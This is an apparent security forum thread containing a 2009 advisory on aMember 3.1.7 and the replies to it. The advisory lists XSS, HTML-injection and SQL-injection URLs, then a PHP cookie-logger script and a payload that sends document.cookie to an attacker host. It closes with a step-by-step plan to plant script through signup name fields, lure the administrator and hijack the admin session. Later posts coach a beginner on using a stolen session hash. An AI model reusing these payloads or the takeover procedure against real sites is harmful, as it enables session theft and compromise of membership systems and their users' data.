AMember 3.1.7 - Multiple Vulnerabilities

[MaXe]

AMember - Multiple Vulnerabilities

Version Affected: 3.1.7 (Apr-10-2009) (newest)

Info: aMember is a flexible membership and subscription management PHP script. It has support for
PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling,
Multicards, E-Gold and Clickbank payment systems (see list of integrated payment systems) and
allows you to setup paid-membership areas on your site. It can also be used without any payment
system - you can manage users manually.

aMember Pro also supports integration plugins to link users database with third-party scripts,
for example vBulletin, Joomla, WordPress (see list of integration plugins).
aMember is a perfect membership software for selling digital subscriptions and downloads.

Opinion: CGI Systems' website has an XSS issue too, they obviously don't realise the impact of XSS.

Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :)

Accurate Googled0rk: (fewer results)
http://lmgtfy.com/?q=inurl%3A%2Famem...T%2C+2002-2006

Inaccurate Googled0rk: (more results)
http://lmgtfy.com/?q=intext%3A%A9+CG...T%2C+2002-2006

External Links:
http://www.amember.com/
http://www.amember.com/p/Main/Download
http://www.amember.com/p/Main/Demo


The Advisory

Version Information:
http://www.website.tld/amember/docs/changelog.txt

Information Disclosure:
http://www.website.tld/amember/docs/tester.php
http://www.website.tld/amember/setup.php?step='
http://www.website.tld/amember/admin/report.php?report=' (admin only)
- More files are affected. (discloses full path to the file)

Cross Site Scripting (admin only - might not survive a login screen!)
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?status="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/setup.php?notebook=<script>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_threads.php?action=edit&thread_id="><sc ript>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_guests.php?action=edit&guest_id="><scri pt>alert(0)</script>
http://www.website.tld/amember/admin/products.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/protect.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/coupons.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_banner&banner_id="><sc ript>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_link&banner_id="><scri pt>alert(0)</script>
http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl=<script>alert(0)</script>
http://www.website.tld/amember/aff.php?action=<script>alert(0)</script> (this might only affect attacker)
- More files might be affected.

HTML Injection: (insert: "><script>alert(0)</script> into the mentioned forms)
http://www.website.tld/amember/signup.php (first- and last-name)
http://www.website.tld/amember/aff_signup.php (first- and last-name)
http://www.website.tld/amember/profile.php (first- and last-name)

HTML Injection Exception: (this injection might only be possible to be seen by the attacker)
http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too)

Affeced Sites (by HTML Injection):
http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive)
http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action= search_by_string
http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection)
http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYM ENTID&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME
-- More files might be affected.

SQL Injection: (requires admin access)
http://www.website.tld/amember/admin/access_log.php?order1='a.time+DESC&order2='a.time+ DESC
http://www.website.tld/amember/admin/aff_clicks.php?year_month='&action=aff_sales
http://www.website.tld/amember/admin/products.php?action=delete&product_id='
-- More files might be affected, the depth of SQL Injection was not checked!

Solution
All the files are encrypted according to CGI Systems' website.

Questions and answers

I've downloaded aMember, but the source code is corrupted. How can I download it again ?
The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology

Which essentially mean i was unable to find any solution to the problem.
I believe this vulnerability might be exploited in the wild due to it is very
easy to find and take advantage of. (if you know what you're looking for)

Ways of abusing the HTML Injection and XSS
The following are examples of what you can input as first- and/or last-name:
"><SCRIPT SRC=//intern0t.net/.j>
- Works only in FireFox and NetScape 8.1-G (Gecko)

Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based
partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE,
Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is
especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is
valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.

Firstname: "><script src="//intern0t.net/.j
Lastname: "></script> </
- Works in FireFox but should work in all browsers.

Firstname: "><iframe src="http://google.com
Lastname: "></iframe> </
- Works in all browsers.

Firstname: "><iframe src="//intern0t.net
Lastname: "></iframe> </
- Should work in all browsers as well. (tested in FireFox)

The following is an example of how a cookie stealer will work in conjunction with the exploit:
<script>document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie;</script>
- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work.
-- Reference about url encoding: http://www.blooberry.com/indexdot/ht...rlencoding.htm

CookieLogger:

PHP Code:

<?php 

function GetIP() 
{ 
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        $ip = getenv("HTTP_CLIENT_IP"); 
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        $ip = getenv("HTTP_X_FORWARDED_FOR"); 
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        $ip = getenv("REMOTE_ADDR"); 
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 
        $ip = $_SERVER['REMOTE_ADDR']; 
    else 
        $ip = "unknown"; 
    return($ip); 
} 

function logData() 
{ 
    $ipLog="log.txt"; 
    $cookie = $_SERVER['QUERY_STRING']; 
    $register_globals = (bool) ini_get('register_gobals'); 
    if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
    else $ip = GetIP(); 

    $rem_port = $_SERVER['REMOTE_PORT']; 
    $user_agent = $_SERVER['HTTP_USER_AGENT']; 
    $rqst_method = $_SERVER['METHOD']; 
    $rem_host = $_SERVER['REMOTE_HOST']; 
    $referer = $_SERVER['HTTP_REFERER']; 
    $date=date ("l dS of F Y h:i:s A"); 
    $log=fopen("$ipLog", "a+"); 

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>"); 
    else 
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); 
    fclose($log); 
} 

logData(); 
header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf"); 
?>

When you have gotten a hash from the admin of the victim site you can issue:
Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie)

What's the first thing you could do as admin?
http://www.website.tld/amember/admin/backup.php

What's the best way to exploit the vulnerability?
1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)

2) The file should contain the following:

HTML Code:

document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;

3) Sign up and make you first name: (try aff_signup.php to avoid paying!)
"><script src="//evilsite.tld/.j

4) Make your last name:
"></script> </

5) Make your username:
aaaaaaaaa

6) After signing up, go to profile.php and make sure the first- and last-name are correct.

7) Wait or social engineer the administrator to click: "Browse Users" in his admin panel, that's all!

Conclusion
The vendor was (originally) not contacted due to they have encrypted all of
the files and because i believe in full disclosure and open source!

The vendor was contacted the 25th May due to the vulnerability might be
exploited more than usual in the wild after public disclosure the 14th May.

Disclosure Information:
- Vulnerabilities found early start of May 2009.
- Advisory finished and published 14th May on InterN0T.
- Bugtraq (SecurityFocus) and Milw0rm contacted the 24th May.
- OSVDB, CVE (Mitre) and CGI Systems contacted the 25th May.
- Bugtraq: http://www.securityfocus.com/bid/35089/info
- Secunia: http://secunia.com/advisories/35182/

All of the best,
MaXe

[MaXe]

Updated with the best method to exploit the vulnerability and 1 addition to the cookielogger:

PHP Code:

header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf"); 


The following script was also added to the thread:
document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;

[sparkling]

I have got the Hash but don't know how to use it. Can anyone help me here?
sorry im kind of a noob

When you have gotten a hash from the admin of the victim site you can issue:
Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie)

[MaXe]

If i had a hash like 9cdfb439c7876e703e307864c9167a15 (md5 of the word lol),
then i would enter the following in my browser: (where you normally type in websites)
javascript:void(document.cookie="PHPSESSID=9cdfb43 9c7876e703e307864c9167a15")

Keep in mind that you should have legal access and that I nor InterN0T has absolutely
no responsibility for whatever harm or malicious intentions you might have, good day sir ;-)

[tommowas]

hey guys i have an amember site 3.1.4 though when i goto add the html injection it rejects it and prompts to enter a first name and last name.. i have done exactly as stated above i have even subbed the " char with its html equivelent. should i just convert the entire injected string to html and try that or wont that work?
would appreciate the feedback.
cheers

[tommowas]

ok i have managed to get it saved using
&lt;/script&gt; (obviously not the full code) but = to "><script>alert(0)</script>
once this has been injected when i goto view profile should it prompt or does it only prompt for the admin the browses the users?

[MaXe]

It should give you an alert box saying 0. The problem is that if you have downloaded the
newest version then they have already included a security fix for this :-) They made that
a few weeks ago. Even the site which has version 3.1.4 might have the security fix applied ;-)

About the html injection, well first you need a vulnerable version and then in the files
mentioned above, f.ex. signup.php, aff_signup.php or profile.php it was possible to
inject: "><script>alert(0)</script> which in return would be triggered at certain admin
panel pages / sites that an administrator would view :-)

PS: Using &lt; and &gt; wont make the script work except if you're breaking a bad-character filter that returns it to normal ;-)
The above was by the way tested with MySQL 4 (i think) and magic_quotes turned on. No big deal about the magic quotes though :-P

[NetRolller 3D]

Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :)

Anyone mind telling me how my nickname got attached to this exploit? I was not involved in making it, to the best of my knowledge. (I assume it was added by someone on Freenode/#remote-exploit, as I usually use my nickname in the form ".NetRolller 3D", which Freenode normalizes to "NetRolller3D".)

[macd3v]

Anyone mind telling me how my nickname got attached to this exploit? I was not involved in making it, to the best of my knowledge. (I assume it was added by someone on Freenode/#remote-exploit, as I usually use my nickname in the form &quot;.NetRolller 3D&quot;, which Freenode normalizes to &quot;NetRolller3D&quot;.)

I think it was more of a shout out to all those people. Because it also says all of intern0t... and obviously all of intern0t didn't make it too. so there ya go

[MaXe]

Anyone mind telling me how my nickname got attached to this exploit? I was not involved in making it, to the best of my knowledge. (I assume it was added by someone on Freenode/#remote-exploit, as I usually use my nickname in the form ".NetRolller 3D", which Freenode normalizes to "NetRolller3D".)

InterN0T is there since I might have used some ressources from our community :-)

The people that are written there is because they have given me help, inspiration or
examples of how I could use XSS or Javascript the way I wanted to ;-) We talked in
#remote-exploit on Freenode, so that's why NetRoller :-)